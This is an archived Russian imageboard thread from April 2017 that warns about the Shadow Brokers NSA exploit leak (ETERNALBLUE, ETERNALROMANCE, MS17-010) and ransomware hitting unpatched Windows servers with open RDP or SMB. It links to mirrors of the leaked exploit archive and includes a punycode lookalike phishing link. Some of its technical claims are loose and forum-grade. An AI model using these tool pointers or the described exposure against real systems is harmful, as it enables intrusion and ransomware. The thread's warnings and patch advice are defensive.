Этого треда уже нет.
Это копия, сохраненная 18 апреля 2017 года.
Скачать тред: только с превью, с превью и прикрепленными файлами.
Второй вариант может долго скачиваться. Файлы будут только в живых или недавно утонувших тредах. Подробнее
Если вам полезен архив М.Двача, пожертвуйте на оплату сервера.
Это копия, сохраненная 18 апреля 2017 года.
Скачать тред: только с превью, с превью и прикрепленными файлами.
Второй вариант может долго скачиваться. Файлы будут только в живых или недавно утонувших тредах. Подробнее
Если вам полезен архив М.Двача, пожертвуйте на оплату сервера.
6 Кб, 697x164
Не знаю, на какую доску вбросить, кину тут.
14 апреля группа ShadowBroker высыпала в общий доступ кучку эксплойтов для разного.
Не прошло и трех дней, как НАЧАЛОСЬ.
В зоне риска все виндоадмины и просто любители держать дедик с виртуалкой и доступом по рдп.
Если у тебя винда торчит открытым rdp в интернет, особенно если у тебя winserver 2008 - ты попал, так что скорее беги ставить патчи от Microsoft или закрывать порт.
https://github.com/misterch0c/shadowbroker/
У меня лично только что так заовнили пустую виртуалку, с которой я иногда ходил в обход блокировок.
Так-то пофиг, все равно была дотационная, лол. Но знаю, что многие не озадачиваются своевременной защитой.
Обратите внимание, возможно ваш сервер или виртуалку уже шифруют.
14 апреля группа ShadowBroker высыпала в общий доступ кучку эксплойтов для разного.
Не прошло и трех дней, как НАЧАЛОСЬ.
В зоне риска все виндоадмины и просто любители держать дедик с виртуалкой и доступом по рдп.
Если у тебя винда торчит открытым rdp в интернет, особенно если у тебя winserver 2008 - ты попал, так что скорее беги ставить патчи от Microsoft или закрывать порт.
https://github.com/misterch0c/shadowbroker/
У меня лично только что так заовнили пустую виртуалку, с которой я иногда ходил в обход блокировок.
Так-то пофиг, все равно была дотационная, лол. Но знаю, что многие не озадачиваются своевременной защитой.
Обратите внимание, возможно ваш сервер или виртуалку уже шифруют.
115 Кб, 932x792
В списке много всякого, что заставит обладателя непропатченной винды отложить большой кирпич.
А патч вышел только в прошлую пятницу, обновились не все.
А патч вышел только в прошлую пятницу, обновились не все.
Ответы151219069
бамп еще одной свежей (на самом деле нет) штукой
http://thehackernews.com/2017/04/unicode-Punycode-phishing-attack.html
Сидишь на хроме, проверяешь ссылки по которым ходишь? Не все так однозначно.
http://thehackernews.com/2017/04/unicode-Punycode-phishing-attack.html
Сидишь на хроме, проверяешь ссылки по которым ходишь? Не все так однозначно.
Ответы151216981
Нихуя не понял из тобой сказанного. Воще похуй.
Ответы151188996
>>151187104
Бывает.
На линуксе сидишь, или на винде?
Возможно, пост увидит кто-то, кому не похуй.
Реально, достаточно злая и внезапная штука, которая может сделать так, что станет ОЧЕНЬ НЕ ПОХУЙ.
По степени опасности напоминает времена XP sp2, когда стоило только выставить голую винду в интернет, как сразу что-то прилетало.
Бывает.
На линуксе сидишь, или на винде?
Возможно, пост увидит кто-то, кому не похуй.
Реально, достаточно злая и внезапная штука, которая может сделать так, что станет ОЧЕНЬ НЕ ПОХУЙ.
По степени опасности напоминает времена XP sp2, когда стоило только выставить голую винду в интернет, как сразу что-то прилетало.
Ответы151189953
Ответы151191280
>>151189953
На той репе отсутствует часть файлов, бери уж с оригинала на меге. https://github.com/x0rz/EQGRP
Но тред-то не об этом.
Эти эксплойты пошли в жизнь, они действительно рабочие и доставляют массу неприятностей.
У кого открыты порты rdp и smb в интернет, внутри локальной сети - позаботьтесь о патчах.
Ибо любой дятел с нулевыми правами может хакнуть ваш сервак (и уже есть шифраторы, которые это используют).
Собственно тема только стартовала, через пару-тройку дней будет вой в интернетах "ой, меня похакали, что делать".
На той репе отсутствует часть файлов, бери уж с оригинала на меге. https://github.com/x0rz/EQGRP
Но тред-то не об этом.
Эти эксплойты пошли в жизнь, они действительно рабочие и доставляют массу неприятностей.
У кого открыты порты rdp и smb в интернет, внутри локальной сети - позаботьтесь о патчах.
Ибо любой дятел с нулевыми правами может хакнуть ваш сервак (и уже есть шифраторы, которые это используют).
Собственно тема только стартовала, через пару-тройку дней будет вой в интернетах "ой, меня похакали, что делать".
Ответы151192610
>>151184817 (OP)
С разморозкой. Свежака ноль целых хуй десятых, полезно будет разве что уженешкольникам и админам их уровня.
мимо системный инженер в области ИТ безопасности
С разморозкой. Свежака ноль целых хуй десятых, полезно будет разве что уженешкольникам и админам их уровня.
мимо системный инженер в области ИТ безопасности
Ответы151192549
>>151192087
Для них и писано. Лишний раз пошевелятся и накатят патчи.
А вот это не факт. Что-то пофиксили давно, что-то - только по факту в прошлую пятницу. Что-то осталось незакрытым.
Эксплойты выкатили в общий доступ всего три дня назад.
https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/
Но. Все ли вовремя обновляются? Все ли админы-эникеи знают про это?
Пусть уж лучше кто-то прочтет, почешет репу и защитится, чем будет потом прыгать с горящей сракой.
> полезно будет разве что уженешкольникам и админам их уровня.
Для них и писано. Лишний раз пошевелятся и накатят патчи.
>С разморозкой. Свежака ноль целых хуй десятых
А вот это не факт. Что-то пофиксили давно, что-то - только по факту в прошлую пятницу. Что-то осталось незакрытым.
Эксплойты выкатили в общий доступ всего три дня назад.
https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/
Но. Все ли вовремя обновляются? Все ли админы-эникеи знают про это?
Пусть уж лучше кто-то прочтет, почешет репу и защитится, чем будет потом прыгать с горящей сракой.
Ответы151201590
Ответы151192973
>>151192610
Там и так все давно в курсе наверняка.
Я постил именно для того, чтобы обратить внимание энкеев и недоадминов. Да вообще всех.
Впереди явно будет эпидемия лютых шифровальщиков, которые в случае забивания на обновления и прочее могут легко
а) повышать приоритет до админа и шифровать все, до чего дотянутся.
б) искать машины с открытыми smb и rdp портами в локальной сети (а таких мелкофирм, где три компа и сервак - тысячи) и получать с помощью этого админский доступ, шифруя все на них.
Так что это варнинг всем, будьте аккуратнее и делайте бекапы и ставьте патчи.
Там и так все давно в курсе наверняка.
Я постил именно для того, чтобы обратить внимание энкеев и недоадминов. Да вообще всех.
Впереди явно будет эпидемия лютых шифровальщиков, которые в случае забивания на обновления и прочее могут легко
а) повышать приоритет до админа и шифровать все, до чего дотянутся.
б) искать машины с открытыми smb и rdp портами в локальной сети (а таких мелкофирм, где три компа и сервак - тысячи) и получать с помощью этого админский доступ, шифруя все на них.
Так что это варнинг всем, будьте аккуратнее и делайте бекапы и ставьте патчи.
>>151192973
Да я и сам давно не падейтил систему, т.к. была эпопея с впариванием 10-ки.
Теперь, похоже, обновиться придётся.
А вообще у меня странная идея - выдрать из винды встроенный SMB-сервер и впихнуть туда кросскомпилированный линуксовый сервер и клиент.
Да я и сам давно не падейтил систему, т.к. была эпопея с впариванием 10-ки.
Теперь, похоже, обновиться придётся.
А вообще у меня странная идея - выдрать из винды встроенный SMB-сервер и впихнуть туда кросскомпилированный линуксовый сервер и клиент.
Ответы151201210
>>151192973
П.С. я б потолковал ещё на тему инфосекьюрити. Ты в irc/jabber'е обитаешь?
П.С. я б потолковал ещё на тему инфосекьюрити. Ты в irc/jabber'е обитаешь?
>>151184817 (OP)
Обычным юзверям можно не беспокоиться, я правильно понял?
Обычным юзверям можно не беспокоиться, я правильно понял?
Ответы151194671
>>151194337
Обычным лучше тоже побеспокоиться. Если даже работаешь из-под ограниченнгого пользователя, то на непатченной машине эксплойт может выполнить код с полными правами.
Тоже обновляйся.
Кроме того, я уже писал выше, есть старый и эффективный способ фишинга, тоже внезапно слишком много стало встречаться.
Например вот сайт - https://www.аррӏе.com/ - выглядит нормально? (если макаба не сломает ссылку)
Обычным лучше тоже побеспокоиться. Если даже работаешь из-под ограниченнгого пользователя, то на непатченной машине эксплойт может выполнить код с полными правами.
Тоже обновляйся.
Кроме того, я уже писал выше, есть старый и эффективный способ фишинга, тоже внезапно слишком много стало встречаться.
Например вот сайт - https://www.аррӏе.com/ - выглядит нормально? (если макаба не сломает ссылку)
>>151192973
О, значит биток полезет вверх. Надо закупиться
О, значит биток полезет вверх. Надо закупиться
Ответы151201483
Если я сижу за НАТом, мне же похуй - так? Это хакиры диапазоны мканят, а меня недосканят? Так?
Ответы151198841
>>151184817 (OP)
На моем ноуте и так уже было установлено куча репаков разных игр с торрентов, где аноны в комментах кидали логи касперского что там какой-то файл заражен и мне было похуй, ибо лень был оперекачивать. Отключен мелкомягкий фаервол и прочее, потому что не нужною
А ты тут о некроОС.
Хотя, XP я бы поставил.
На моем ноуте и так уже было установлено куча репаков разных игр с торрентов, где аноны в комментах кидали логи касперского что там какой-то файл заражен и мне было похуй, ибо лень был оперекачивать. Отключен мелкомягкий фаервол и прочее, потому что не нужною
А ты тут о некроОС.
Хотя, XP я бы поставил.
Ответы151201210
>>151194671
Что за магия?
Что за магия?
Ответы151198841
>>151194671
Да. Опиши, нихуя не понятно.
Типа вместо одной буквы там какой-то другой?
>выглядит нормально?
Да. Опиши, нихуя не понятно.
Типа вместо одной буквы там какой-то другой?
Ответы151198841
Опушка, два чаю тебе
Ответы151199410
>>151196143
Как сказать. Если высунул rdp, чтобы ходить на домашнюю тачку с работы или из отпуска - ты попал.
Если нет, то вариант второй - ссылка типа той, что выше, ведущая якобы на обычный сайт. Даже внимательный анон может кликнуть по такой, не все же пиксельхантингом заниматься.
А дальше - либо эксплойты в adobe flash, дыры постоянно находятся свежие и все с remote execution, либо еще что-то похожее.
Например письмо от банка, от МТС/билайна с якобы детализацией, что-то ОБЫЧНОЕ. Чуть невнимательно глянул, типа как с той ссылкой на эппл.ком - и все, чпок, здравствуйте.
>>151197067
>>151197519
Да, punycode, если не присматриваться, то не заметишь сразу.
А много ли анонов-параноиков, которые пыцрятся в ссылку, прежде чем перейти по ней, особенно когда она выглядит знакомо?
>Если я сижу за НАТом, мне же похуй - так?
Как сказать. Если высунул rdp, чтобы ходить на домашнюю тачку с работы или из отпуска - ты попал.
Если нет, то вариант второй - ссылка типа той, что выше, ведущая якобы на обычный сайт. Даже внимательный анон может кликнуть по такой, не все же пиксельхантингом заниматься.
А дальше - либо эксплойты в adobe flash, дыры постоянно находятся свежие и все с remote execution, либо еще что-то похожее.
Например письмо от банка, от МТС/билайна с якобы детализацией, что-то ОБЫЧНОЕ. Чуть невнимательно глянул, типа как с той ссылкой на эппл.ком - и все, чпок, здравствуйте.
>>151197067
>>151197519
Да, punycode, если не присматриваться, то не заметишь сразу.
А много ли анонов-параноиков, которые пыцрятся в ссылку, прежде чем перейти по ней, особенно когда она выглядит знакомо?
>>151184817 (OP)
О чем тут говорят?
О чем тут говорят?
Есть отдельный инсталлер для спермерки?
>>151198556
Спасибо. Вещь действительно опасная и в первую очередь для обычноанонов, которые начитались в интернете про rdp и прочее, а про безопасность не подумали.
И админы поневоле (он же юрист, "но ты же шаришь в компьютерах") тоже попадают в зону риска.
Я почему тред стартанул - у меня на одном из серваков висела виртуалка с виндой, так, для обхода всяких блокировок торрентов и прочего. Ничего важного, просто чистая винда, обновки стояли вручную по март.
Особо секьюрностью не заморачивался, но наружу торчал лишь рдп порт на нестандартном 43210 вместо 3389.
Поставил всего месяц назад. Судя по остаткам логов - один из тех самых эксплойтов, шифровано все, что можно - запустился из-под админа.
Так-то похрен, новую виртуалку из бекапа раскатаю, но подумалось об анонах, у которых есть какие-то важные данные на таких серваках, а на безопасность они подзабили.
Спасибо. Вещь действительно опасная и в первую очередь для обычноанонов, которые начитались в интернете про rdp и прочее, а про безопасность не подумали.
И админы поневоле (он же юрист, "но ты же шаришь в компьютерах") тоже попадают в зону риска.
Я почему тред стартанул - у меня на одном из серваков висела виртуалка с виндой, так, для обхода всяких блокировок торрентов и прочего. Ничего важного, просто чистая винда, обновки стояли вручную по март.
Особо секьюрностью не заморачивался, но наружу торчал лишь рдп порт на нестандартном 43210 вместо 3389.
Поставил всего месяц назад. Судя по остаткам логов - один из тех самых эксплойтов, шифровано все, что можно - запустился из-под админа.
Так-то похрен, новую виртуалку из бекапа раскатаю, но подумалось об анонах, у которых есть какие-то важные данные на таких серваках, а на безопасность они подзабили.
>>151198747
ПИДОР БЛЯТЬ! ВЫ ПОСМОТРИТЕ, СУКА, НА НЕГО, НЕ ВЫ ПОСМОТРИТЕ СУКА НА НЕГО. ОН БЭКАПИТЬ ПОШЁЛ!
ЛЮДИ СИДЯТ НА ПИВЕ И ХЛЕБЕ, А У КАКОГО-ТО УБЛЮДКА 5 HDD ЗА 12К КАЖДЫЙ ПО 3 ТЕРАБАЙТА АГА, НУ ТЫ МРАЗЬ ССУУУКА, МАЖОР БЛЯТЬ
ПИДОР БЛЯТЬ! ВЫ ПОСМОТРИТЕ, СУКА, НА НЕГО, НЕ ВЫ ПОСМОТРИТЕ СУКА НА НЕГО. ОН БЭКАПИТЬ ПОШЁЛ!
ЛЮДИ СИДЯТ НА ПИВЕ И ХЛЕБЕ, А У КАКОГО-ТО УБЛЮДКА 5 HDD ЗА 12К КАЖДЫЙ ПО 3 ТЕРАБАЙТА АГА, НУ ТЫ МРАЗЬ ССУУУКА, МАЖОР БЛЯТЬ
Ответы151201483
>>151193536
Из той же пачки.
>>151196601
ETERNALROMANCE is a SMB1 exploit over TCP port 445 which targets XP, 2003, Vista, 7, Windows 8, 2008, 2008 R2, and gives SYSTEM privileges (MS17-010)
ETERNALSYNERGY is a SMBv3 remote code execution flaw for Windows 8 and Server 2012 SP0 (MS17-010)
ETERNALBLUE is a SMBv2 exploit for Windows 7 SP1 (MS17-010)
https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
Affected Software and Vulnerability Severity Ratings: Вся линейка от ХР до 10.
Патч от марта, но много ли анонов держат постоянные автообновляторы?
Очень много например таких:
>>151193536
>и впихнуть туда кросскомпилированный линуксовый сервер и клиент.
>ECHOWRECKER remote Samba 3.0.x Linux exploit.
Из той же пачки.
>>151196601
>А ты тут о некроОС.
ETERNALROMANCE is a SMB1 exploit over TCP port 445 which targets XP, 2003, Vista, 7, Windows 8, 2008, 2008 R2, and gives SYSTEM privileges (MS17-010)
ETERNALSYNERGY is a SMBv3 remote code execution flaw for Windows 8 and Server 2012 SP0 (MS17-010)
ETERNALBLUE is a SMBv2 exploit for Windows 7 SP1 (MS17-010)
https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
Affected Software and Vulnerability Severity Ratings: Вся линейка от ХР до 10.
Патч от марта, но много ли анонов держат постоянные автообновляторы?
Очень много например таких:
>>151193536
>Да я и сам давно не падейтил систему, т.к. была эпопея с впариванием 10-ки.
>>151196020
Ты прав, скоро спрос возрастет.
>>151200260
Уважаемый, для вас тоже есть решение - обновленный пак иконок на сервер (по аналогии с торпедой автомобиля), окропить сервер святой водой, помолиться, чтобы минула чаша сия.
>О, значит биток полезет вверх. Надо закупиться
Ты прав, скоро спрос возрастет.
>>151200260
>ЛЮДИ СИДЯТ НА ПИВЕ И ХЛЕБЕ, А У КАКОГО-ТО УБЛЮДКА 5 HDD ЗА 12К КАЖДЫЙ ПО 3 ТЕРАБАЙТА АГА, НУ ТЫ МРАЗЬ ССУУУКА, МАЖОР БЛЯТЬ
Уважаемый, для вас тоже есть решение - обновленный пак иконок на сервер (по аналогии с торпедой автомобиля), окропить сервер святой водой, помолиться, чтобы минула чаша сия.
Ответы151201689
>>151192549
Вот сцукл, а поддержка висты закончиласб аккурат перед этим сливом...
>Пусть уж лучше кто-то прочтет, почешет репу и защитится
Вот сцукл, а поддержка висты закончиласб аккурат перед этим сливом...
>>151201483
Иди нахуй, долбоеб. К чему твой троллинг? Я к тому что у кого-то есть 6 hdd, по 3 терабайта каждый а у кого то нет
Иди нахуй, долбоеб. К чему твой троллинг? Я к тому что у кого-то есть 6 hdd, по 3 терабайта каждый а у кого то нет
Ответы151201783
>>151201689
А, ну извини, я думал что троллишь ты.
Да и радость от этих 6 хдд? Их тоже бекапить надо, они дохнут иногда, а это опять расходы. Все относительно.
А, ну извини, я думал что троллишь ты.
Да и радость от этих 6 хдд? Их тоже бекапить надо, они дохнут иногда, а это опять расходы. Все относительно.
Ответы151202156
>>151201783
Радость от того что имеешь дома часть интернетов, которые к тому времени уже выпилят.
HDD, не SSD, у меня жесткий диск лет 9 работает и до сих пор норм.
Радость от того что имеешь дома часть интернетов, которые к тому времени уже выпилят.
HDD, не SSD, у меня жесткий диск лет 9 работает и до сих пор норм.
Ответы151202476
>>151202156
Я бы на твоем месте не был бы так спокоен.
Увы, это не троллинг.
>лет 9 работает и до сих пор норм.
Я бы на твоем месте не был бы так спокоен.
Увы, это не троллинг.
14 Кб, 1421x316
Пошла жара. На буржуйских форумах начинается бугурт. Кто-то с эксплойтом и шифратором прошел по VPS на самых популярных площадках и собрал жатву.
>>151194671
98% обычных юзеров за NATом сидят и им плхваще.
98% обычных юзеров за NATом сидят и им плхваще.
Что там с RDP? можно без логина\пароля подключиться или что?
Ответы151212706
эксплоиты в ехе чтоли?
>>151211566
Да, если открыт порт rdp (или smb), если операционка windows 7 или винсервер 2003-2008-2012 и если не стоит последний патч от майкрософт - получаем логин с правами SYSTEM
Да, если открыт порт rdp (или smb), если операционка windows 7 или винсервер 2003-2008-2012 и если не стоит последний патч от майкрософт - получаем логин с правами SYSTEM
>>151212706
пиздёж
пиздёж
Ответы151213127
>>151212858
https://www.youtube.com/watch?v=ZgvkNjNt4BM
В данное время все, кто сидел с открытым rdp и непатченной виндой на хецнере и ovh тихо охреневают.
Я и сам охренел, когда мою виртуалку грохнули именно таким образом.
Вся инфа же в треде есть, можешь сам проверить.
https://www.youtube.com/watch?v=ZgvkNjNt4BM
В данное время все, кто сидел с открытым rdp и непатченной виндой на хецнере и ovh тихо охреневают.
Я и сам охренел, когда мою виртуалку грохнули именно таким образом.
Вся инфа же в треде есть, можешь сам проверить.
Ответы151213309
>>151213309
А Я О ЧЕМ И ГОВОРЮ.
У кого серваки/компы смотрят открытым портом rdp в инет - БЕГОМБЫСТРОБЛЕА патчиться.
Меня не спасло даже переназначение 3389 порта на левый типа 43210. Виртуалке месяц исполнился, в марте развернул, пропатчил на тот момент до упора и ОТКЛЮЧИЛ обновления, чтобы не мешали, все равно был временный вариант.
Мне-то норм, а вот тех, у кого похожая ситуация хочу предупредить.
А Я О ЧЕМ И ГОВОРЮ.
У кого серваки/компы смотрят открытым портом rdp в инет - БЕГОМБЫСТРОБЛЕА патчиться.
Меня не спасло даже переназначение 3389 порта на левый типа 43210. Виртуалке месяц исполнился, в марте развернул, пропатчил на тот момент до упора и ОТКЛЮЧИЛ обновления, чтобы не мешали, все равно был временный вариант.
Мне-то норм, а вот тех, у кого похожая ситуация хочу предупредить.
>>151212706
Охуеть. Но так-то уже мало кто использует RDP, да ещё и с выходом в сеть.
Охуеть. Но так-то уже мало кто использует RDP, да ещё и с выходом в сеть.
Ответы151214004
Кстати, за каким хуем они это в сеть выкладывают? что доказать хотят?
Ответы151214230
>>151213788
Ога. То-то всякая удаленная бухгалтерия и дырки на серваки мелких организаций.
Я ради лулзов просканировал диапазон своего провайдера - их там море.
И далее, это работает и внутри локальной сети, изнутри. Если открыты сетевые шары - здраститя, заходите.
Добро пожаловать в 2007й кажется, или когда там дыры в rpc winxp sp2 были размером с ворота?
>Но так-то уже мало кто использует RDP, да ещё и с выходом в сеть.
Ога. То-то всякая удаленная бухгалтерия и дырки на серваки мелких организаций.
Я ради лулзов просканировал диапазон своего провайдера - их там море.
И далее, это работает и внутри локальной сети, изнутри. Если открыты сетевые шары - здраститя, заходите.
Добро пожаловать в 2007й кажется, или когда там дыры в rpc winxp sp2 были размером с ворота?
Ответы151214159
Ответы151214576
>>151214004
Ну хрен знает, много где админил и как правило никто не использует RDP. Радмин, тимвивер, ещё какая-то залупа - вот это пожалуйста.
А вообще изучал rdp-протокол и охуел от его толстоты.
>Ога. То-то всякая удаленная бухгалтерия и дырки на серваки мелких организаций.
Ну хрен знает, много где админил и как правило никто не использует RDP. Радмин, тимвивер, ещё какая-то залупа - вот это пожалуйста.
А вообще изучал rdp-протокол и охуел от его толстоты.
Жаль, что троянского слона так и не дописал:(
>>151213939
Они - это кто?
Эти эксплойты - часть спизженного у NSA инструментария. Так-то фришный кусок архива выкладывали что-то около года назад, там все срали кирпичами с дырок в цисках и прочих суровых сетевых железяках.
А эта часть была под паролем, а пароль продавали за грязные даллары.
То ли купил кто, то ли еще - я в подробности не вдавался, но главное пароль три дня назад всплыл в общем доступе.
Тот годовалый архив-шкатулка Пандоры таки им раскодируется.
И за три дня умельцы уже привинтили эксплойт к шифратору и прошлись маршем смерти по hetzner, ovh и прочим конторам, где многие любили хостить такие вот винбоксы.
Они - это кто?
Эти эксплойты - часть спизженного у NSA инструментария. Так-то фришный кусок архива выкладывали что-то около года назад, там все срали кирпичами с дырок в цисках и прочих суровых сетевых железяках.
А эта часть была под паролем, а пароль продавали за грязные даллары.
То ли купил кто, то ли еще - я в подробности не вдавался, но главное пароль три дня назад всплыл в общем доступе.
Тот годовалый архив-шкатулка Пандоры таки им раскодируется.
И за три дня умельцы уже привинтили эксплойт к шифратору и прошлись маршем смерти по hetzner, ovh и прочим конторам, где многие любили хостить такие вот винбоксы.
Ответы151214340
>>151214230
А, лол, я то думал что какие-то хакеры решили чисто из собственных мотивов в сеть выложить. Ну, раз продавали, тогда молодцы.
А, лол, я то думал что какие-то хакеры решили чисто из собственных мотивов в сеть выложить. Ну, раз продавали, тогда молодцы.
Блять на человеческом языке обьясните че дают эти порты то бля?? я могу подключиться к чужому компу? или на сервак например чужой? например сервак игры у кого стоит я могу ломануть базу данных?
>>151214389
Да, если на нём стоит удалённое подключение.
>я могу подключиться к чужому компу? или на сервак например чужой?
Да, если на нём стоит удалённое подключение.
>>151214389
Не старайся вникнуть во все это, лучше ложись спать, завтра опять бежать в М.Видео на работу.
Не старайся вникнуть во все это, лучше ложись спать, завтра опять бежать в М.Видео на работу.
Ответы151214625
>>151214036
А то, лично знаю таких умельцев. Их на самом деле дофига таких непуганных.
Так что всем, кто в курсе, про что тред - обновляйтесь, закрывайте порты, делайте вход через vpn и ssh туннели - никаких откртытых наружу нативных майкрософт портов.
>Моей предыдущей конторе пизда.
А то, лично знаю таких умельцев. Их на самом деле дофига таких непуганных.
Так что всем, кто в курсе, про что тред - обновляйтесь, закрывайте порты, делайте вход через vpn и ssh туннели - никаких откртытых наружу нативных майкрософт портов.
>>151214449
У многих таких работников из аналогов мвидео местного разлива явно будет выходной. сервак-то не работает, все.
>завтра опять бежать в М.Видео на работу.
У многих таких работников из аналогов мвидео местного разлива явно будет выходной. сервак-то не работает, все.
Обновления-то будут в треде?
Ответы151214746
>>151214653
Они уже есть - выше в треде,ссыль на сайте майкрософта.
Те, кто отключил у себя обновки, опасаясь внезапного пришествия дриснятки - выбирайте, какой вам стул удобнее - с пиками в виде эксплойтов или с удобными мягкими и длинными анальными зондами десятой версии от Майкрософт, лол.
Они уже есть - выше в треде,ссыль на сайте майкрософта.
Те, кто отключил у себя обновки, опасаясь внезапного пришествия дриснятки - выбирайте, какой вам стул удобнее - с пиками в виде эксплойтов или с удобными мягкими и длинными анальными зондами десятой версии от Майкрософт, лол.
Сколько помню Microsoft, регулярно раз в несколько лет просираются таким образом. Причем каждый раз дыры глобальные и дают полный доступ. Они там их по ходу специально встраивают для всяких спецслужб.
Ответы151215507
Вся суть винды. Администрирование сервера по рдп. Фаервол не настроен. Вагон дырок в АНБ. А потом ЗАЩООО.
Ответы151215507
Аноны,о чем вы тут базарите? Я НИХУЯ не понимаю. Я ламер в юзании пк, объясните. Мне интересно
>>151215332
Хакеры выложили программу, с помощью которой можно подключаться к компьютерам где есть удалённое управление.
Хакеры выложили программу, с помощью которой можно подключаться к компьютерам где есть удалённое управление.
>>151215383
И по факту это все компьютеры, имеющие на борту шиндовс и смотрящие в интернеты напрямую. Кстати, не только шиндовс, там и соляра, и саноси.
И по факту это все компьютеры, имеющие на борту шиндовс и смотрящие в интернеты напрямую. Кстати, не только шиндовс, там и соляра, и саноси.
Ответы151215507
>>151214996
А то. 2011, 2013 - дыры примерно такого же калибра. Дыры в ИЕ, которые тоже обеспечивали remote code execution
и кто бы мог подумать - никогда такого не было - и вот опять, снова.
>>151215095
А там и не надо администрировать. Достаточно просто высунуть порт. Даже если в системе разрешено через рдп поработать только юзеру с насмерть урезанными правами.
Это примерно как дыра 11 года, когда можно было кучей пакетов UDP на закрытый порт проломиться до уровня system.
Винда такая винда.
Самое интересное, я так сейчас порыл в сети - куча "советов" как сделать удаленный доступ к себе домой, типа раньше-то рдп был ненадежный, а теперь - огого, можно так в инет выставлять, максимум - порт переназначить.
Интересно, сколько людей последовало таким советам?
>>151215332
Ну например аналогия. У тебя в квартире бронированная дверь, на подъезде домофон. Любой вася может открыть твою супербронированную дверь удаленно, потыкав в кнопки.
Фирма-установщик выпустила исправление, забытый винтик, который нужно вкрутить в замок. Но кто знает об этом, кто не знает, кому дойти лень до установщика.
>>151215438
Да, там и солярки много, и остальной экзотики.
Даже голосовой шлюз от Avaya замногобаксов тоже того...
А то. 2011, 2013 - дыры примерно такого же калибра. Дыры в ИЕ, которые тоже обеспечивали remote code execution
и кто бы мог подумать - никогда такого не было - и вот опять, снова.
>>151215095
> Администрирование сервера по рдп.
А там и не надо администрировать. Достаточно просто высунуть порт. Даже если в системе разрешено через рдп поработать только юзеру с насмерть урезанными правами.
Это примерно как дыра 11 года, когда можно было кучей пакетов UDP на закрытый порт проломиться до уровня system.
Винда такая винда.
Самое интересное, я так сейчас порыл в сети - куча "советов" как сделать удаленный доступ к себе домой, типа раньше-то рдп был ненадежный, а теперь - огого, можно так в инет выставлять, максимум - порт переназначить.
Интересно, сколько людей последовало таким советам?
>>151215332
Ну например аналогия. У тебя в квартире бронированная дверь, на подъезде домофон. Любой вася может открыть твою супербронированную дверь удаленно, потыкав в кнопки.
Фирма-установщик выпустила исправление, забытый винтик, который нужно вкрутить в замок. Но кто знает об этом, кто не знает, кому дойти лень до установщика.
>>151215438
Да, там и солярки много, и остальной экзотики.
Даже голосовой шлюз от Avaya замногобаксов тоже того...
>>151215655
Откуда ты знаешь?
Откуда ты знаешь?
Ответы151215865
>>151215655
Два варианта, либо ты умеешь их готовить, либо до них еще очередь не дошла.
У тебя рдп наружу торчит? Патчи стоят?
Два варианта, либо ты умеешь их готовить, либо до них еще очередь не дошла.
У тебя рдп наружу торчит? Патчи стоят?
Ответы151215865
>>151215383
Если мой пк не подключен к инету (сижу тут онли с планшета) мне можно спать спокойно?
Если мой пк не подключен к инету (сижу тут онли с планшета) мне можно спать спокойно?
>>151215831
нет, даже если пк выключен
нет, даже если пк выключен
>>151215689
ничего подозрительного не заметил
>>151215731
Да. win 2008r2, раз в несколько месяцев накатывал патчи.
>Откуда ты знаешь?
ничего подозрительного не заметил
>>151215731
>Два варианта, либо ты умеешь их готовить, либо до них еще очередь не дошла.
>У тебя рдп наружу торчит? Патчи стоят?
Да. win 2008r2, раз в несколько месяцев накатывал патчи.
Ответы151216119
>>151215831
Я сейчас подъеду, вскрою окно, подключусь по локалке и пока ты будешь тихо спать, я спижжу твою коллекцию прона и паст.
Я сейчас подъеду, вскрою окно, подключусь по локалке и пока ты будешь тихо спать, я спижжу твою коллекцию прона и паст.
>>151215865
Ну так-то у меня на той несчастной виртуалке тоже 2008р2 стояла, последние патчи тоже в начале марта накатывал.
Исправление было 17 марта.
Так что я бы тебе посоветовал СРОЧНО обновляться, вешать рдп порт за туннель ssh хотя бы.
Где хостишься? Основная атака вчера и сегодня была на ovh, hetzner, redstation - в основном буржуйские хостинги.
Так что я бы тебе советовал не терять времени, а то может уже процесс идет.
Я для этого тред и начал, чтобы предупредить таких анонов.
>Да. win 2008r2, раз в несколько месяцев накатывал патчи.
Ну так-то у меня на той несчастной виртуалке тоже 2008р2 стояла, последние патчи тоже в начале марта накатывал.
Исправление было 17 марта.
Так что я бы тебе посоветовал СРОЧНО обновляться, вешать рдп порт за туннель ssh хотя бы.
Где хостишься? Основная атака вчера и сегодня была на ovh, hetzner, redstation - в основном буржуйские хостинги.
Так что я бы тебе советовал не терять времени, а то может уже процесс идет.
Я для этого тред и начал, чтобы предупредить таких анонов.
Ответы151216246
>>151216119
Так-то спасибо. Странно что на других порталах этой новости не видел.
Какой KB ?
Обновляюсь, но вешать ничего не буду, ибо это костыли.
>Я для этого тред и начал, чтобы предупредить таких анонов.
Так-то спасибо. Странно что на других порталах этой новости не видел.
>Исправление было 17 марта.
Какой KB ?
>Так что я бы тебе посоветовал СРОЧНО обновляться, вешать рдп порт за туннель ssh хотя бы.
Обновляюсь, но вешать ничего не буду, ибо это костыли.
По rdp уязвимы все версии винды, или только win2003, для которой в репе эксплоит?
>>151216301
от Windows 2000 и Server 2012 до Windows 7 и 8.
от Windows 2000 и Server 2012 до Windows 7 и 8.
Ответы151217301
>>151216246
Через пару дней увидишь, гарантирую.
Это прямо вот сейчас происходит.
Посмотри на http://www.webhostingtalk.com/showthread.php?t=1643701 - первые очнувшиеся начинают появляться.
https://technet.microsoft.com/library/security/ms17-mar
Там сплошь решето, кроме rdp и smb там еще замечательные дыры в обработчике PDF, в adobe flash, как обычно, в графических библиотеках.
И все такое няшное, все с remote code execution
Ну мое дело сообщить, что с этой информацией кто будет делать - его проблемы.
Я бы вообще не стал ни одного нативного порта высовывать наружу. Туннель не проблема, vpn не проблема, ясно, что не так удобно, но увы, не то время, чтобы радоваться удобствам.
>>151216301
Вроде как все (от xp до 8.1 и соответственно 2008r2 точно). Насчет десятки не уверен, но знакомые говорят, что подтверждается на 2012 сервере, так что я бы не рисковал.
>Так-то спасибо. Странно что на других порталах этой новости не видел.
Через пару дней увидишь, гарантирую.
Это прямо вот сейчас происходит.
Посмотри на http://www.webhostingtalk.com/showthread.php?t=1643701 - первые очнувшиеся начинают появляться.
>Какой KB ?
https://technet.microsoft.com/library/security/ms17-mar
Там сплошь решето, кроме rdp и smb там еще замечательные дыры в обработчике PDF, в adobe flash, как обычно, в графических библиотеках.
